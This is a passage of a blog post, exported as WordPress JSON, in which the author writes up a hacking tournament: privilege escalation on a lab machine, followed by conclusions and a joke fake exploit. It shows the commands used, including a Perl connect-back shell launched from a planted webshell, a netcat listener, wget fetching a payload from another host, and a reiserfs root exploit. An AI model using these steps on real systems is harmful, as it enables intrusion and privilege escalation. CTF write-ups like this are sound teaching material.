main()<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 3 <\/strong>: upload the files<\/p>\n<p>I basically uploaded both files (corelanc0d3r and reis.py) to 192.168.6.70 (via ftp, put them in c:\\surgemail\\www). Next, I downloaded them from my os shell onto the \"ghost\" machine using some simple wget calls.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp -<span style=\"color: #0000ff;\">inv<\/span> 192.168.6.70 &lt; ftpcmd \nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\n331 Password required for devil\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail\/www<\/span>\".\n200 Type set to I\nlocal: corelanc0d3r remote: corelanc0d3r\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for corelanc0d3r\n226 Transfer complete.\n9125 bytes sent in 0.40 secs\nlocal: reis.py remote: reis.py\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for reis.py\n226 Transfer complete.\n1801 bytes sent in 0.37 secs\n221 Goodbye.<\/pre>\n<p>I already had planted the corelanshell.pl script on 192.168.6.70, so I issued the following command 
using the c99 webshell :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">perl \/var\/lock\/corelanshell.pl 192.168.6.114 4455<\/pre>\n<p>Reverse connection accepted, ready to get the 2 files and put them on the server<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lp 4455\n\n:: Depth :: Connect Back Shell ::\ncd \/apachelogs\nmkdir <span style=\"color: #0000ff;\">data<\/span>\ncd <span style=\"color: #0000ff;\">data<\/span>\nwget http:<span style=\"color: #008000;\">\/\/192.168.6.70\/corelanc0d3r<\/span>\nwget http:<span style=\"color: #008000;\">\/\/192.168.6.70\/reis.py<\/span><\/pre>\n<p>Find a good location (not mounted with noexec)...\u00a0 =&gt; \/dev\/shm<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image40.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb40.png\" alt=\"image\" width=\"373\" height=\"201\" border=\"0\" \/><\/a><\/p>\n<p>(I moved the reis.py file to that location)<\/p>\n<p>(important to note that \/apachelogs does not show up in the mount list... but I didn't try to mount it myself... 
perhaps I should have).<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Step 4 <\/strong>: prepare folders<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cd \/apachelogs\nmkdir .reiserfs_priv\nmkdir .reiserfs_priv\/xattrs<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 5 <\/strong>: 0wn<\/p>\n<p>Current situation :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">\/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r  =&gt; compiled payload\n\/dev\/shm\/reis.py =&gt; python script<\/pre>\n<p>Launch the exploit :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 650px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cd \/dev\/shm\nls\nreis.py\n\npython .\/reis.py\nid\nuid=0(r00t) gid=0(r00t) groups=33(www-data)<\/pre>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cat \/root\/proof.txt\nsDSjnSo22bSe12sadjdjrudfknk4455qndlas4<\/pre>\n<p>&nbsp;<\/p>\n<h4>Conclusions<\/h4>\n<ul>\n<li>Using redirects and custom responses, modifying headers etc. are good measures. They will slow down scripts and script kiddies, but won't stop seasoned hackers from discovering the real identity\/engines and\/or breaking into the system.<\/li>\n<li>Although it was somewhat hidden, the \"ghost\" machine runs some vulnerable code, giving an attacker the ability to issue commands on the system and get a shell. Don't rely on the \"need to know\" principle. 
Hackers will find out that you planted files somewhere and if it's vulnerable, they will use it to hack into your system.<\/li>\n<li>The web server runs with a low privilege account, but the combination of the vulnerable code, with insecure file\/folder permissions (write access + execute access) may allow for further exploitation.<\/li>\n<li>On top of that, the reiserfs implementation is buggy and can allow an attacker to escalate privileges, essentially allowing him to obtain root permissions.<\/li>\n<li>Weak firewall rules : allowing a server to access other servers (outbound connections), when that is not really necessary, may provide a hacker the ability to serve\/download malicious files.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Challenge 3 : Ghost2 (joke of the day)<\/h3>\n<p>After having finished the challenges, I decided to have some fun with the guys in the #HSIYF channel, and try to spread the rumour that I had found another (hidden) machine. I told them that this machine does not show any open ports, but it does respond to http requests on port 8080 when connected (pivoting) from 192.168.6.70\/71\/72.<\/p>\n<p>About 2 hours before the games ended, I posted the output of (an obvious fake) exploit to the channel :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">c:\\sploits&gt;perl corelan0wner_iis0day.pl 192.168.6.xx 8080\n[+] corelanc0d3r's sploit for ghost2 (hidden machine)\n[+] Creating payload... \n[+] Connecting to port 8080\n[+] Sending stage 1 (3219 bytes)...\n[+] Sending stage 2 (1211 bytes)...\n[+] Sleeping 30 seconds (<span style=\"color: #0000ff;\">wait<\/span> for hunter)\n[+] Sending stage 3 (2104 bytes, priv escalation)\n[+] ...\n[+] Telnet to port 5555\n\nMicrosoft Windows [Version 6.0.6001]\nCopyright (c) 2006 Microsoft Corporation.  
All rights reserved\n\nC:\\Windows\\<span style=\"color: #0000ff;\">system<\/span>32&gt;whoami\nNT AUTHORITY\\SYSTEM<\/pre>\n<p>I'm not sure how many people fell for it and went back to the \"killthen00b\" machines, to see if there was something they could find from that machine....<\/p>\n<p>The number of PMs I received following my fake message was a good indication that I managed to freak out a number of people... that was fun.\u00a0 Panic all over the place \ud83d\ude00<\/p>\n<p>So OffSec, if you noticed some high(er) traffic on killthen00b, about 2 hours before the games ended...\u00a0 Sorry for that \ud83d\ude42<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Finally :<\/h3>\n<ul>\n<li>Big high five to my friends at Corelan Team. You guys rock !<\/li>\n<li>Make no mistake - although reading this write-up probably took you max. half an hour or so, actually taking the challenge took a LOT longer (also caused by the fact that I spent about a day in the hospital).\u00a0 Anyways, I still had a lot of fun and learned a lot.<\/li>\n<li>Greetz to some of the other participants (VADiUM, smtx, raph0x88, fireking300, etc... at least you guys didn't delete my files on the server \ud83d\ude42 Respect for that )<\/li>\n<\/ul>\n<blockquote><p>By the way : smtx made a nice video about the \"ghost challenge\". 
You can see the video here : http:\/\/www.information-security-training.com\/videos\/smtx-ghost-challenge-video\/<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Ranking<\/h3>\n<p>Rank before submitting the documentation :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image42.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb42.png\" alt=\"image\" width=\"221\" height=\"289\" border=\"0\" \/><\/a><\/p>\n<p>Final rank :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image43.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb43.png\" alt=\"image\" width=\"234\" height=\"234\" border=\"0\" \/><\/a><\/p>\n<p>(So I guess this documentation\/blogpost sucks).<\/p>\n<p>Oh well.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel. 
document your findings and submit them &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Offensive Security Hacking Tournament - How strong was my fu ?\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[245,127],"tags":[3735,2310,2308,2179,883,583],"class_list":["post-3767","post","type-post","status-publish","format-standard","hentry","category-exploits","category-security","tag-juniper-netscreen-screenos","tag-hacking","tag-ctf","tag-offensive-security","tag-security","tag-vpn"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Offensive Security Hacking Tournament - How strong was my fu ? 
- Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab &quot;secret&quot; information from a machine and post it to the Tournament Control Panel. document your findings and submit them &hellip; Continue reading &quot;Offensive Security Hacking Tournament - How strong was my fu ?&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-05-10T21:20:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Offensive Security Hacking Tournament - How strong was my fu ?\",\"datePublished\":\"2010-05-10T21:20:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"},\"wordCount\":5142,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"keywords\":[\"juniper netscreen screenos\",\"hacking\",\"ctf\",\"offensive security\",\"security\",\"vpn\"],\"articleSection\":[\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\",\"name\":\"Offensive Security Hacking Tournament - How strong was my fu ? 
- Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"datePublished\":\"2010-05-10T21:20:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Offensive Security Hacking Tournament &#8211; How strong was my fu 
?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity 
Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Offensive Security Hacking Tournament - How strong was my fu ? 
- Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","og_locale":"en_US","og_type":"article","og_title":"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel. document your findings and submit them &hellip; Continue reading \"Offensive Security Hacking Tournament - How strong was my fu ?\"","og_url":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability 
Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2010-05-10T21:20:00+00:00","og_image":[{"url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","type":"","width":"","height":""}],"author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Offensive Security Hacking Tournament - How strong was my fu ?","datePublished":"2010-05-10T21:20:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"},"wordCount":5142,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","keywords":["juniper netscreen screenos","hacking","ctf","offensive security","security","vpn"],"articleSection":["Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","url":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","name":"Offensive Security Hacking Tournament - How strong was my fu ? 
- Corelan | Exploit Development &amp; Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","datePublished":"2010-05-10T21:20:00+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Offensive Security Hacking Tournament &#8211; How strong was my fu ?"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals 
worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. 
With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":62319,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=3767"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3767\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=3767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=3767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=3767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}